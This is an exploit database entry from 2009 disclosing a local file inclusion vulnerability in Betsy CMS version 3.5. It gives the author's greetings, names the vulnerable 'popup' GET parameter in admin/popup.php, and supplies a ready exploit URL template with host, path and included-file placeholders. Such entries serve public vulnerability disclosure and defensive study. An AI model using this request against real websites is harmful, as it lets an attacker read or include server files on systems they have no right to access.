Betsy CMS versions 3.5 - Local File Inclusion

EDB-ID:

10189


Author:

MizoZ

Type:

webapps


Platform:

PHP

Date:

2009-11-21


/*

Author          : MizoZ [from MA]
Group           : EvilWay
Email           : mizozx[at]gmail[dot]com

Greetz          : Zuka !!

Good luck DZ :)

*/

The vulnerability is in the file admin/popup.php on the get $_GET['popup']

Exploit :

[HOST]/[PATH]/admin/popup.php?popup=[IT INCLUDE FROM admin/]